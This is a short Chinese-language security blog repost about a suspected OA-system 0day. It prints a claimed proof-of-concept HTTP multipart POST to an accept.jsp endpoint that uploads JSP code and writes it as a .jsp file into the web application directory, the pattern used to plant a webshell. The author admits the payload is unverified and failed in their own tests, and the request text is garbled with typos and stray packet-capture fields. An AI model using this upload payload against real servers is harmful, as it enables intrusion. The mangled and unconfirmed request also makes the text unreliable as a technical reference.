声明
以下内容并未证实,是否存在漏洞未可知。若漏洞真实存在,请遵守网络安全法,切勿用作违法用途,一切后果均与本人无关
无意中看到一个POC
payload=POST/aim/equipmap/accept.jspHTTP/1.1
User-Aaent:Mozilla/5.0 (Windows NT 10.0:Win64:x64) AppleWebKit/53736(KHTMLike Gecko)Chrome/890.4389.90 Safari/537.36
Content-Length:436 Accept: text/html Connection: close
Content-Type:multipart/form-data;boundary=---------------------------16314487820932200903769468567 Accept-Encoding:gzip
---------------16314487820932200903769468567
Content-Disposition:form-data; name="upload;filename="222222.txt Content-Type:text/plain
<% out.println("bea86d66a5278f9e6fa1112d2e2fcebf"); %>
------------------16314487820932200903769468567
Content-Disposition:form-data;name="fname
Iwebappsnc web180900fd668c51631353aca37fc1f829.jsp
------------16314487820932200903769468567--;tcp.flags=24;tcp.flags.syn=0;tcp.flags.ack=1;tcp.flags.
reset=0;tcp.flags.fin=0;tcp.flags.push=1tcp.flags.urg=0;tcp.seq=2292457002;tcp.nxtseq=956110407;tcp.window size=229
看这个请求链接查了一下,应该是 用有NC的,然后就在fofa上搜了一下。该OA系统确实存在accept.jsp文件,但是访问报错。
于是就用burp构造了一个请求包,但还是报错,不过这次报错的内容不太一样。或许POC有问题,也有可能没有这个漏洞。没有源码,也懒得去验证,睡觉保命要紧。
原文始发于微信公众号(安全透视镜):【护网情报】疑似某OA 0day曝光
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论